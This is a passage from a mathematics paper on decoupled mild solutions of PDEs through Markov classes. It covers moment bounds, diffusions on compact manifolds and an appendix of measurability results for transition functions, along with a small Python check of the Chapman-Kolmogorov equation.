for a positive constant $C_2$. So by Gronwall's Lemma there exists $C_3>0$ such
that $|k^{-1}(x)|\leq C_3e^{C_2|x|}, \ \forall x \in {\mathbb R}$.
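Let us detail the use of Gronwall's Lemma: setting $g(x):=\log\left(1+|k^{-1}(x)|\right)$, the previous bound (recall $(k^{-1})'>0$) yields
\begin{equation*}
|g'(x)|\leq\frac{(k^{-1})'(x)}{1+|k^{-1}(x)|}\leq C_2 \text{ for a.e. } x,
\end{equation*}
so that $g$ is Lipschitz with constant $C_2$ and $g(x)\leq g(0)+C_2|x|$; exponentiating gives the announced bound with, for instance, $C_3:=1+|k^{-1}(0)|$.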
\\
Now, thanks to the Aronson estimates on the transition function
$p^Z$
of $Z$, for every $p > 0$, we have
\begin{equation}
\begin{array}{rcl}
\mathbbm{E}^{s,x}[|X_t|^p] &\leq& C_3^p\int e^{C_2p|z|}p^Z_{t-s}(k(x),z)dz\\
&\leq& C_3^p\int e^{C_2p|z|}\frac{M}{\sqrt{t-s}}e^{-\frac{|k(x)-z|^2}{M(t-s)}}dz\\
&\leq& C_3^pM^{\frac{3}{2}}\int e^{C_2p(\sqrt{M(t-s)}|y|+|k(x)|)}e^{-y^2}dy\\
&\leq& Ae^{B |k(x)|} ,
\end{array}
\end{equation}
where $A,B$ are two constants depending on $p$, $M$, $T$, $C_2$ and $C_3$.
This implies that $\mathbbm{E}^{s,x}[|X_T|^p]<\infty$ and
$\mathbbm{E}^{s,x}[\int_s^T|X_r|^pdr]<\infty$.
\end{proof}
We can now state the main result of this section.
\begin{proposition}
Assume that the non-explosion condition \eqref{NonExplosion} is verified
and the validity of the two following items.
\begin{itemize}
\item the (TA) condition \eqref{(TA)} is fulfilled, $\sigma$ has linear growth and $(f,g)$ verifies $H^{lip}(\zeta,\eta)$ (see Hypothesis \ref{Hpq}) with $\zeta:x\mapsto|x|^p$, $\eta:x\mapsto|x|^q$ for some $p,q\in\mathbbm{R}_+$;
\item $(f,g)$ verifies $H^{lip}_b$, see Hypothesis \ref{Hpq}.
\end{itemize}
Then \eqref{PDEdistri} has a unique decoupled mild solution $u$ in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{proof}
The assertion comes from Theorem \ref{MainTheorem} which applies thanks to Propositions \ref{MPnewdomaindistri}, \ref{MomentsDistri} and \ref{HomoMeasurableint}.
\end{proof}
\begin{remark}
\begin{enumerate}
\item A first analysis linking
PDEs (in fact second order elliptic differential equations) with distributional drift to BSDEs
was performed in \cite{wurzer}.
In those BSDEs the final horizon was a stopping time.
\item In \cite{issoglio_jing16}, the authors have considered a class of BSDEs
involving particular distributions.
\end{enumerate}
\end{remark}
\subsection{Diffusion equations on differential manifolds}\label{S4d}
In this section, we provide an example of application in a non-Euclidean space.
We consider a compact connected smooth differential manifold $M$ of dimension $n$. We denote by $\mathcal{C}^{\infty}(M)$ the linear algebra of smooth functions from $M$ to $\mathbbm{R}$, and $(U_i,\phi_i)_{i\in I}$ its atlas. The reader may consult \cite{jost}
for an extensive introduction to the study of differential manifolds, and \cite{hsu} concerning diffusions on differential manifolds.
\begin{lemma} \label{LPolish}
$M$ is Polish.
\end{lemma}
\begin{proof} \
By Theorem 1.4.1 in \cite{jost}, $M$ may be equipped with a Riemannian metric,
which we denote by $g$, and its topology may be metrized by the associated distance, which we denote by $d$.
As any
compact metric space, $(M,d)$ is separable and complete,
so that $M$ is a Polish space.
\end{proof}
We denote by $(\Omega,\mathcal{F},(X_t)_{t\in[0,T]},(\mathcal{F}_t)_{t\in[0,T]})$ the canonical space associated to $M$ and $T$,
see Definition \ref{canonicalspace}.
\begin{definition}
An operator $L:\mathcal{C}^{\infty}(M)\longrightarrow\mathcal{C}^{\infty}(M)$ will be called a \textbf{smooth second order elliptic non degenerate differential operator on $M$} if for any chart
$\phi:U\longrightarrow \mathbbm{R}^n$ there exist smooth $\mu:\phi(U)\longrightarrow \mathbbm{R}^n$ and $\alpha:\phi(U)\longrightarrow S^*_+(\mathbbm{R}^n)$ such that on $\phi(U)$ for any $f\in\mathcal{C}^{\infty}(M)$ we have
\begin{equation}
Lf(\phi^{-1}(x))=\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}(x)\partial_{x_ix_j}(f\circ\phi^{-1})(x)+\underset{i=1}{\overset{n}{\sum}}\mu^i(x)\partial_{x_i}(f\circ\phi^{-1})(x).
\end{equation}
\end{definition}
$\alpha$ and $\mu$ depend on the chart $\phi$, but this dependence will sometimes be
omitted and we will say that, in some given local coordinates,
\\ $Lf=\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}\partial_{x_ix_j}f+\underset{i=1}{\overset{n}{\sum}}\mu^i\partial_{x_i}f$.
The following definition comes from \cite{hsu}, see Definition 1.3.1.
\begin{definition}
Let $L$ denote a smooth second order elliptic non degenerate differential operator on $M$.
Let $x\in M$. A probability measure $\mathbbm{P}^x$ on $(\Omega,\mathcal{F})$ will be called an \textbf{$L$-diffusion starting in $x$} if
\begin{itemize}
\item $\mathbbm{P}^x(X_0=x)=1$;
\item for every $f\in\mathcal{C}^{\infty}(M)$, $f(X)-\int_0^{\cdot}Lf(X_r)dr$ is a $(\mathbbm{P}^x,(\mathcal{F}_t)_{t\in[0,T]})$ local martingale.
\end{itemize}
\end{definition}
\begin{remark}
No explosion can occur for continuous stochastic processes with values in
a compact space, so there is no need to consider paths in the compactification of $M$ as in Definition 1.1.4 in \cite{hsu}.
\\
Theorems 1.3.4 and 1.3.5 in \cite{hsu} state that for any $x\in M$, there exists a unique $L$-diffusion starting in $x$. Theorem 1.3.7 in \cite{hsu} implies that those probability measures $(\mathbbm{P}^x)_{x\in M}$ define a homogeneous Markov class.
\end{remark}
For a given operator $L$, the carr\'e du champ operator $\Gamma$ is given (in local coordinates) by
$\Gamma(\phi,\psi)=\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}\partial_{x_i}\phi\partial_{x_j}\psi$,
see equation (1.3.3) in \cite{hsu}. We wish to emphasize here that the carr\'e du champ operator has recently become a powerful tool in the study of geometrical properties of Riemannian manifolds. The reader may refer e.g. to \cite{bakry}.
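As an elementary illustration, in a chart where $\alpha^{i,j}=\delta_{i,j}$ and $L$ reduces (up to first order terms) to $\frac{1}{2}\Delta$, one simply has
\begin{equation*}
\Gamma(\phi,\phi)=\underset{i=1}{\overset{n}{\sum}}(\partial_{x_i}\phi)^2=|\nabla\phi|^2,
\end{equation*}
so that $\sqrt{\Gamma(\phi,\phi)}$ plays the role of the modulus of the gradient.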
\begin{definition}
$(\mathbbm{P}^x)_{x\in M}$ will be called the \textbf{$L$-diffusion}.
If $M$ is equipped with a specific Riemannian metric $g$
and $L$ is chosen to be equal to $\frac{1}{2}\Delta_g$ where $\Delta_g$ is the Laplace-Beltrami operator associated to $g$, then $(\mathbbm{P}^x)_{x\in M}$ will be called the \textbf{Brownian motion associated to $g$}, see \cite{hsu} Chapter 3 for details.
\end{definition}
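We recall that, in local coordinates, the Laplace-Beltrami operator reads
\begin{equation*}
\Delta_g f=\frac{1}{\sqrt{\det g}}\underset{i,j=1}{\overset{n}{\sum}}\partial_{x_i}\left(\sqrt{\det g}\,g^{i,j}\partial_{x_j}f\right),
\end{equation*}
so that $\frac{1}{2}\Delta_g$ is indeed of the previous form with $\alpha^{i,j}=g^{i,j}$, the inverse metric.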
We now fix some smooth second order elliptic non degenerate differential operator $L$ and the $L$-diffusion $(\mathbbm{P}^x)_{x\in M}$. We introduce the associated Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times M}$ as described in Notation \ref{HomogeneNonHomogene}, which by Proposition \ref{HomoMeasurableint} is measurable in time.
\begin{notation}
We define $\mathcal{D}(\partial_t+L)$ the set of functions $u:[0,T]\times M\longrightarrow \mathbbm{R}$ such that, for any chart $\phi:U\longrightarrow \mathbbm{R}^n$, the mapping
\begin{equation}
\begin{array}{rcl}
[0,T]\times \phi(U)&\longrightarrow& \mathbbm{R}\\
(t,x) &\longmapsto& u(t,\phi^{-1}(x))
\end{array}
\end{equation}
belongs to $\mathcal{C}^{\infty}([0,T]\times \phi(U),\mathbbm{R})$, the set of infinitely continuously differentiable functions in the usual Euclidean setup.
\end{notation}
\begin{lemma}\label{LemmaManifold}
$\mathcal{D}(\partial_t+L)$ is a linear algebra included in $\mathcal{D}^{max}(\partial_t+L)$ as defined in Notation \ref{NotDomain}.
\end{lemma}
\begin{proof}
For some fixed chart $\phi:U\longrightarrow \mathbbm{R}^n$, $\mathcal{C}^{\infty}([0,T]\times \phi(U),\mathbbm{R})$ is an algebra, so it is immediate that $\mathcal{D}(\partial_t+L)$ is an algebra.
\\
Moreover, if $u\in\mathcal{D}(\partial_t+L)$, it is clear that
\begin{itemize}
\item $\forall x\in M$, $u(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$ and $\forall t\in[0,T]$, $u(t,\cdot)\in\mathcal{C}^{\infty}(M)$;
\item $\forall t\in[0,T]$, $\partial_t u(t,\cdot)\in\mathcal{C}^{\infty}(M)$ and $\forall x\in M$, $Lu(\cdot,x)\in\mathcal{C}^1([0,T],\mathbbm{R})$.
\end{itemize}
Given a chart $\phi:U\longrightarrow \mathbbm{R}^n$, by the Schwarz
Theorem allowing the commutation of partial derivatives
(in the classical Euclidean setup), we have for $x\in\phi(U)$
\begin{equation}
\begin{array}{rcl}
\partial_t\circ L(u)(t,\phi^{-1}(x))&=&\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}(x)\partial_t\partial_{x_ix_j}\left(u(\cdot,\phi^{-1}(\cdot))\right)(t,x)+\underset{i=1}{\overset{n}{\sum}}\mu^i(x)\partial_t\partial_{x_i}\left(u(\cdot,\phi^{-1}(\cdot))\right)(t,x)\\
&=&\frac{1}{2}\underset{i,j=1}{\overset{n}{\sum}}\alpha^{i,j}(x)\partial_{x_ix_j}\partial_t\left(u(\cdot,\phi^{-1}(\cdot))\right)(t,x)+\underset{i=1}{\overset{n}{\sum}}\mu^i(x)\partial_{x_i}\partial_t\left(u(\cdot,\phi^{-1}(\cdot))\right)(t,x)\\
&=&L\circ\partial_t (u)(t,\phi^{-1}(x)).
\end{array}
\end{equation}
So $\partial_t\circ Lu=L\circ\partial_tu$. Finally $\partial_tu$, $Lu$ and $\partial_t\circ Lu$ are continuous (since they are continuous on all the sets $[0,T]\times U$ where $U$ is the domain of a chart) and are therefore bounded as continuous functions on the compact set $[0,T]\times M$.
This concludes the proof.
\end{proof}
\begin{corollary}
$(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times M}$ solves the well-posed Martingale Problem associated to $(\partial_t+L,\mathcal{D}(\partial_t+L),V_t\equiv t)$ in the sense of Definition \ref{MartingaleProblem}.
\end{corollary}
\begin{proof}
The corollary derives from Lemma \ref{LemmaManifold} and Corollary \ref{conclusionA4}.
\end{proof}
We fix a couple $(f,g)$ verifying $H^{lip}_b$ (see Hypothesis \ref{Hpq})
and consider the PDE
\begin{equation}\label{PDEmanifold}
\left\{
\begin{array}{l}
\partial_tu + Lu +f(\cdot,\cdot,u,\sqrt{\Gamma(u,u)})=0\quad\text{ on }[0,T]\times M\\
u(T,\cdot) = g.
\end{array}\right.
\end{equation}
Since Theorem \ref{MainTheorem} applies, we have the following result.
\begin{proposition}
Equation \eqref{PDEmanifold} admits a unique decoupled mild solution $u$ in the sense of Definition \ref{mildsoluv}.
\end{proposition}
\begin{remark}
Since $M$ is compact, we emphasize that if $g$ is continuous and $f$ is continuous in $(t,x)$ and Lipschitz in $(y,z)$, then $(f,g)$ verifies $H^{lip}_b$.
\end{remark}
\begin{appendices}
\section{Markov classes}\label{A2}
In this Appendix we recall some basic definitions and results concerning Markov processes. For a complete study of homogeneous Markov processes one may consult \cite{dellmeyerD}; concerning non-homogeneous Markov classes, our reference is Chapter VI of \cite{dynkin1982markov}. The first definition refers to the canonical space that one can find in \cite{jacod79}, see paragraph 12.63.
\begin{notation}\label{canonicalspace}
In the whole section $E$ will be a fixed Polish space (a separable
completely metrizable topological space). $E$ will be called the \textbf{state space}.
\\
\\
We consider $T\in\mathbbm{R}^*_+$. We denote by $\Omega:=\mathbbm{D}([0,T],E)$
the space of functions from $[0,T]$ to $E$ which are right-continuous with left limits and continuous at time $T$, i.e. cadlag. For any $t\in[0,T]$ we denote the coordinate mapping $X_t:\omega\mapsto\omega(t)$, and we introduce on $\Omega$ the $\sigma$-field $\mathcal{F}:=\sigma(X_r|r\in[0,T])$.
\\
On the measurable space $(\Omega,\mathcal{F})$, we introduce the measurable \textbf{canonical process}
\begin{equation*}
X:
\begin{array}{rcl}
(t,\omega)&\longmapsto& \omega(t)\\ \relax
([0,T]\times \Omega,\mathcal{B}([0,T])\otimes\mathcal{F}) &\longrightarrow & (E,\mathcal{B}(E)),
\end{array}
\end{equation*}
and the right-continuous filtration $(\mathcal{F}_t)_{t\in[0,T]}$ where $\mathcal{F}_t:=\underset{s\in]t,T]}{\bigcap}\sigma(X_r|r\leq s)$ if $t<T$, and $\mathcal{F}_T:= \sigma(X_r|r\in[0,T])=\mathcal{F}$.
\\
$\left(\Omega,\mathcal{F},(X_t)_{t\in[0,T]},(\mathcal{F}_t)_{t\in[0,T]}\right)$ will be called the \textbf{canonical space} (associated to $T$ and $E$).
\\
For any $t \in [0,T]$ we denote $\mathcal{F}_{t,T}:=\sigma(X_r|r\geq t)$, and
for any $0\leq t\leq u<T$ we will denote
$\mathcal{F}_{t,u}:= \underset{n\geq 0}{\bigcap}\sigma(X_r|r\in[t,u+\frac{1}{n}])$.
\end{notation}
Since $E$ is Polish, we recall that $\mathbbm{D}([0,T],E)$ can be equipped with a Skorokhod distance which makes it a Polish metric space (see Theorem 5.6 in Chapter 3 of \cite{EthierKurz}) and for which the Borel $\sigma$-field is $\mathcal{F}$ (see Proposition 7.1 in Chapter 3 of \cite{EthierKurz}). This in particular implies that $\mathcal{F}$ is separable, as the Borel $\sigma$-field of a separable metric space.
\begin{remark}
The previous definitions and all the notions of this Appendix
extend to the case of a time interval equal to $\mathbbm{R}_+$, or to the case in which the Skorokhod space is replaced by the space of continuous functions from $[0,T]$ (or $\mathbbm{R}_+$) to $E$.
\end{remark}
\begin{definition}\label{Defp}
The function
\begin{equation*}
p:\begin{array}{rcl}
(s,x,t,A) &\longmapsto& p(s,x,t,A) \\ \relax
[0,T]\times E\times[0,T]\times\mathcal{B}(E) &\longrightarrow& [0,1],
\end{array}
\end{equation*}
will be called \textbf{transition function} if, for any $s,t$ in $[0,T]$,
$x_0\in E$, $A\in \mathcal{B}(E)$,
it verifies
\begin{enumerate}
\item $x \mapsto p(s,x,t,A)$ is Borel,
\item $B \mapsto p(s,x_0,t,B)$ is a probability measure on $(E,\mathcal{B}(E))$,
\item if $t\leq s$ then $p(s,x_0,t,A)=\mathds{1}_{A}(x_0)$,
\item if $s<t$, for any $u>t$, $\int_{E} p(s,x_0,t,dy)p(t,y,u,A) =
p(s,x_0,u,A)$.
\end{enumerate}
\end{definition}
The latter statement is the well-known \textbf{Chapman-Kolmogorov equation}.
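On a finite state space with integer times, the items above can be illustrated explicitly: any (here arbitrarily chosen) stochastic matrix $P$ induces the transition function $p(s,x,t,A)=\underset{y\in A}{\sum}(P^{t-s})_{x,y}$ for $s<t$, and the Chapman-Kolmogorov equation reduces to $P^{t-s}P^{u-t}=P^{u-s}$. A minimal sketch:

```python
import numpy as np

# Finite-state illustration of a transition function:
# E = {0, 1, 2}, P an arbitrary stochastic matrix, and
# p(s, x, t, A) = sum_{y in A} (P^(t-s))_{x,y} for integer s < t.

P = np.array([[0.5, 0.3, 0.2],
              [0.1, 0.6, 0.3],
              [0.2, 0.2, 0.6]])

def p(s, x, t, A):
    if t <= s:                      # item 3: frozen before time s
        return float(x in A)
    kernel = np.linalg.matrix_power(P, t - s)
    return float(sum(kernel[x, y] for y in A))

# Item 2: p(s, x, t, .) is a probability measure on E.
assert abs(p(0, 1, 5, {0, 1, 2}) - 1.0) < 1e-12

# Item 4 (Chapman-Kolmogorov): summing over an intermediate time.
s, t, u, A = 0, 2, 5, {0, 2}
for x in range(3):
    lhs = sum(p(s, x, t, {y}) * p(t, y, u, A) for y in range(3))
    assert abs(lhs - p(s, x, u, A)) < 1e-12
```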
\begin{definition}\label{DefFoncTrans}
A transition function $p$ for which the first item is reinforced
by supposing that $(s,x)\longmapsto p(s,x,t,A)$ is Borel for any $t,A$,
will be said to be \textbf{measurable in time}.
\end{definition}
\begin{remark} \label{RDefFoncTrans}
Let $p$ be a transition function which is measurable in time.
By approximation by step functions, one can easily show that,
for any Borel function $\phi$ from $E$ to $\bar{\mathbbm{R}}$,
the map $(s,x)\mapsto \int \phi(y)p(s,x,t,dy)$ is Borel, provided
$\phi$ is quasi integrable with respect to $p(s,x,t,\cdot)$ for every $(s,x)$.
\end{remark}
\begin{definition}\label{defMarkov}
A \textbf{canonical Markov class} associated to a transition function $p$ is a set of probability measures $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ defined on the measurable space
$(\Omega,\mathcal{F})$ and verifying for any $t \in [0,T]$ and $A\in\mathcal{B}(E)$
\begin{equation}\label{Markov1}
\mathbbm{P}^{s,x}(X_t\in A)=p(s,x,t,A),
\end{equation}
and for any $s\leq t\leq u$
\begin{equation}\label{Markov2}
\mathbbm{P}^{s,x}(X_u\in A|\mathcal{F}_t)=p(t,X_t,u,A)\quad \mathbbm{P}^{s,x}\text{ a.s.}
\end{equation}
\end{definition}
\begin{remark}\label{Rfuturefiltration}
Formula 1.7 in Chapter 6 of \cite{dynkin1982markov} states
that for any $F\in \mathcal{F}_{t,T}$ we have
\begin{equation}\label{Markov3}
\mathbbm{P}^{s,x}(F|\mathcal{F}_t) = \mathbbm{P}^{t,X_t}(F)=\mathbbm{P}^{s,x}(F|X_t)\,\text{ }\, \mathbbm{P}^{s,x} \text{a.s.}
\end{equation}
Property \eqref{Markov3} will be called
\textbf{Markov property}.
\end{remark}
For the rest of this section, we are given a canonical Markov class $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ with transition function $p$.
\\
We will complete the $\sigma$-fields ${\mathcal F}_t$ of the canonical filtration by $\mathbbm{P}^{s,x}$ as follows.
\begin{definition}\label{CompletedBasis}
For any $(s,x)\in[0,T]\times E$ we will consider the $(s,x)$-\textbf{completion} $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ of the stochastic basis $\left(\Omega,\mathcal{F},(\mathcal{F}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ by defining $\mathcal{F}^{s,x}$ as the $\mathbbm{P}^{s,x}$-completion of $\mathcal{F}$, by extending $\mathbbm{P}^{s,x}$ to $\mathcal{F}^{s,x}$ and finally by defining $\mathcal{F}^{s,x}_t$ as the $\mathbbm{P}^{s,x}$-closure of $\mathcal{F}_t$ (meaning $\mathcal{F}_t$ augmented with the $\mathbbm{P}^{s,x}$-negligible sets) for every $t\in[0,T]$.
\end{definition}
We remark that, for any $(s,x)\in[0,T]\times E$, $\left(\Omega,\mathcal{F}^{s,x},(\mathcal{F}^{s,x}_t)_{t\in[0,T]},\mathbbm{P}^{s,x}\right)$ is a stochastic basis fulfilling the usual conditions, see (1.4) in Chapter I of \cite{jacod}.
We recall that considering a conditional expectation with respect to a $\sigma$-field augmented with the negligible sets or not, does not change the result. In particular we have the following.
\begin{proposition}\label{ConditionalExp}
Let $(\mathbbm{P}^{s,x})_{(s,x)\in[0,T]\times E}$ be a canonical Markov class. Let $(s,x)\in[0,T]\times E$ be fixed, $Z$ be a random variable and $t\in[s,T]$, then
\\
$\mathbbm{E}^{s,x}[Z|\mathcal{F}_t]=\mathbbm{E}^{s,x}[Z|\mathcal{F}^{s,x}_t]$ $\mathbbm{P}^{s,x}$ a.s.
\end{proposition}
\begin{proposition}\label{Borel}
Let $Z$ be a random variable. If the function $(s,x)\longmapsto \mathbbm{E}^{s,x}[Z]$
is well-defined (with possible values in $[-\infty, \infty]$), then at fixed $s\in[0,T]$,
$x\longmapsto \mathbbm{E}^{s,x}[Z]$ is Borel.
If moreover the transition function $p$ is measurable in time then, $(s,x)\longmapsto \mathbbm{E}^{s,x}[Z]$ is Borel. \\
In particular, if $F\in \mathcal{F}$ is fixed, then at fixed $s\in[0,T]$, $x\longmapsto \mathbbm{P}^{s,x}(F)$ is Borel. If
the transition function $p$ is measurable in time then, $(s,x)\longmapsto \mathbbm{P}^{s,x}(F)$ is Borel.
\end{proposition}
\begin{proof}
We will only deal with the case of a measurable in time transition function since the other case is proven in a very similar way.
\\
We consider first the case $Z = 1_F$ where $F\in \mathcal{F}$.
We start by assuming that $F$ is of the form $\underset{i\leq n}{\bigcap}\{X_{t_i}\in A_i\},$ where $n\in\mathbbm{N}^*$, $0=t_0 \leq t_1<\cdots<t_n \le T$ and $A_1,\cdots,A_n$ are Borel sets of $E$, and we denote by $\Pi$ the set of such events. \\
In this proof we will make use of monotone class arguments,
see for instance Section 4.3 in \cite{aliprantis} for the definitions of $\pi$-systems and $\lambda$-systems and for the presently used
version of the monotone class
theorem, also called Dynkin's lemma.
\\
We remark
that $\Pi$ is a $\pi$-system (see Definition 4.9 in \cite{aliprantis}) generating $\mathcal{F}$. For such events we can explicitly compute $\mathbbm{P}^{s,x}(F)$.
We compute
this quantity when $(s,x)$ belongs to
$[t_{i^*-1},t_{i^*}[\times E$ for some
$0< i^* \leq n$.
On $[t_n,T]\times E$, a similar computation can be performed.
We will show below that those restricted functions are Borel,
the general result will follow by
concatenation.
We have
\begin{equation*}
\begin{array}{rcl}
& &\mathbbm{P}^{s,x}(F) \\
&=& \overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\mathbbm{E}^{s,x}\left[\overset{n}{\underset{j=i^*}{\Pi}}\mathds{1}_{A_j}(X_{t_j})\right]\\
&=& \overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\mathbbm{E}^{s,x}\left[\overset{n-1}{\underset{j=i^*}{\Pi}}\mathds{1}_{A_j}(X_{t_j})\mathbbm{E}^{s,x}[\mathds{1}_{A_n}(X_{t_n})|\mathcal{F}_{t_{n-1}}]\right]\\
&=& \overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\mathbbm{E}^{s,x}\left[\overset{n-1}{\underset{j=i^*}{\Pi}}\mathds{1}_{A_j}(X_{t_j})p(t_{n-1},X_{t_{n-1}},t_n,A_n)\right]\\
&=&\cdots\\
&=&\overset{i^*-1}{\underset{i=1}{\Pi}}\mathds{1}_{A_i}(x)\bigintsss \left(\overset{n}{\underset{j=i^*+1}{\Pi}}\mathds{1}_{A_j}(x_j)p(t_{j-1},x_{j-1},t_j,dx_j)\right)\mathds{1}_{A_{i^*}}(x_{i^*})p(s,x,t_{i^*},dx_{i^*}),
\end{array}
\end{equation*}
which indeed is Borel in $(s,x)$ thanks to Definition \ref{DefFoncTrans}
and Remark \ref{RDefFoncTrans}.
\\
We can extend this result to any event $F$ by the monotone class theorem. Indeed, let $\Lambda$ be the set of elements $F$ of $\mathcal{F}$ such that $(s,x)\mapsto\mathbbm{P}^{s,x}(F)$ is Borel. For any two events $F^1$, $F^2$, in $\Lambda$ with $F^1\subset F^2$, since for any $(s,x)$,
\\
$\mathbbm{P}^{s,x}(F^2\backslash F^1)=\mathbbm{P}^{s,x}(F^2)-\mathbbm{P}^{s,x}(F^1)$, $(s,x)\mapsto\mathbbm{P}^{s,x}(F^2\backslash F^1)$ is still Borel. For any increasing sequence $(F^n)_{n\geq 0}$ of
elements of $\Lambda$, $\mathbbm{P}^{s,x}(\underset{n\in\mathbbm{N}}{\bigcup}F^n)=\underset{n\rightarrow\infty}{\text{lim }}\mathbbm{P}^{s,x}(F^n)$ so $(s,x)\mapsto \mathbbm{P}^{s,x}(\underset{n\in\mathbbm{N}}{\bigcup}F^n)$ is still Borel, therefore $\Lambda$ is a $\lambda$-system containing the $\pi$-system $\Pi$ which generates $\mathcal{F}$. So by the monotone class theorem, $\Lambda=\mathcal{F}$,
which shows the case $Z = 1_F$.
\\
We go on with the proof when $Z$ is a general r.v. If $Z\geq 0$, there exists an increasing sequence $(Z_n)_{n\geq 0}$ of simple functions on $\Omega$ converging pointwise to $Z$, and thanks to the case $Z=\mathds{1}_F$ treated above, for each of these functions, $(s,x)\mapsto \mathbbm{E}^{s,x}[Z_n]$ is Borel. Therefore since by monotone convergence, $ \mathbbm{E}^{s,x}[Z_n]\underset{n\rightarrow\infty}{\longrightarrow}\mathbbm{E}^{s,x}[Z]$, then $(s,x)\mapsto\mathbbm{E}^{s,x}[Z]$ is Borel as the pointwise limit of Borel functions. For a general $Z$ one just has to consider its decomposition $Z=Z^+-Z^-$ where $Z^+$ and $Z^-$ are positive.
\end{proof}
\begin{lemma}\label{LemmaBorel}
Assume that the transition function of the canonical Markov class is measurable in time.
\\
Let $V$ be a continuous non-decreasing function on $[0,T]$ and
$f\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ be such that for every $(s,x)\in[0,T]\times E$,
$\mathbbm{E}^{s,x}[\int_s^{T}|f(r,X_r)|dV_r]<\infty$. Then
$(s,x)\longmapsto \mathbbm{E}^{s,x}[\int_s^{T}f(r,X_r)dV_r]$ is Borel.
\end{lemma}
\begin{proof}
We will start by showing that on $([0,T]\times E)\times [0,T]$, the function
\\
$k^n:(s,x,t)\mapsto \mathbbm{E}^{s,x}[\int_{t}^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is Borel, where $n\in\mathbbm{N}$.
\\
Let $t\in[0,T]$ be fixed. Then by Proposition \ref{Borel},
\\
$(s,x)\mapsto\mathbbm{E}^{s,x}[\int_t^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is Borel. Let $(s,x)\in[0,T]\times E$ be fixed and $t_m\underset{m\rightarrow\infty}{\longrightarrow} t$ be a converging sequence in $[0,T]$. Since $V$ is continuous, $\int_{t_m}^{T}((-n)\vee f(r,X_r)\wedge n)dV_r\underset{m\rightarrow\infty}{\longrightarrow}\int_{t}^{T}((-n)\vee f(r,X_r)\wedge n)dV_r$ a.s. Since this sequence is uniformly bounded, by the dominated convergence theorem, the same convergence holds under the expectation. This implies that $t\mapsto \mathbbm{E}^{s,x}[\int_t^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is continuous. By Lemma 4.51 in \cite{aliprantis}, $k^n$ is therefore jointly Borel.
\\
By composing with $(s,x,t)\mapsto (s,x,s)$, we also have that for any $n\geq 0$, $\tilde{k}^n:(s,x)\longmapsto\mathbbm{E}^{s,x}[\int_s^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ is Borel. Then by letting $n$ tend to infinity, $(-n)\vee f(r,X_r)\wedge n$ tends $dV\otimes d\mathbbm{P}^{s,x}$ a.e. to $f(r,X_r)$ and since we assumed $\mathbbm{E}^{s,x}[\int_s^{T}|f(r,X_r)|dV_r]<\infty$, by dominated convergence, $\mathbbm{E}^{s,x}[\int_s^{T}((-n)\vee f(r,X_r)\wedge n)dV_r]$ tends to $\mathbbm{E}^{s,x}[\int_s^{T}f(r,X_r)dV_r]$.
\\
$(s,x)\longmapsto \mathbbm{E}^{s,x}[\int_s^{T}f(r,X_r)dV_r]$ is therefore Borel as the pointwise limit of the $\tilde{k}^n$ which are Borel.
\end{proof}
\begin{proposition}\label{measurableint}
Let $f\in\mathcal{B}([0,T]\times E,\mathbbm{R})$ be such that for any $(s,x,t)$, $\mathbbm{E}^{s,x}[|f(t,X_t)|]<\infty$ then at fixed $s\in[0,T]$, $(x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel. If moreover the transition function $p$ is measurable in time, then
\\
$(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel.
\end{proposition}
\begin{proof}
We will only show the case in which $p$ is measurable in time since the other case is proven very similarly.
\\
We start by showing the statement for $f\in\mathcal{C}_b([0,T]\times E,\mathbbm{R})$. $X$ is cadlag,
hence so is $t\longmapsto f(t,X_t)$. So for any fixed
$(s,x)\in[0,T]\times E$, if we take a converging sequence $t_n\underset{n\rightarrow\infty}{\longrightarrow} t^+$ (resp. $t^-$),
an easy application of the
Lebesgue dominated convergence theorem shows that
$t\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is cadlag.
On the other hand, by Proposition \ref{Borel}, for a fixed $t$, $(s,x)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel. Therefore by Theorem 15 Chapter IV of \cite{dellmeyer75}, $(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is jointly Borel.
\\
In order to extend the result to any $f\in\mathcal{B}_b([0,T]\times E,\mathbbm{R})$, we consider the subset $\mathcal{I}$ of functions $f\in\mathcal{B}_b([0,T]\times E,\mathbbm{R})$ such that $(s,x,t)\longmapsto \mathbbm{E}^{s,x}[f(t,X_t)]$ is Borel. Then $\mathcal{I}$ is a linear space stable by uniform convergence and by monotone convergence and containing $\mathcal{C}_b([0,T]\times E,\mathbbm{R})$ which is stable by multiplication and generates the Borel $\sigma$-field $\mathcal{B}([0,T])\otimes \mathcal{B}(E)$. So by Theorem 21 in Chapter I of \cite{dellmeyer75}, $\mathcal{I}=\mathcal{B}_b([0,T]\times E,\mathbbm{R})$. This theorem is sometimes called the functional monotone class theorem.
\\
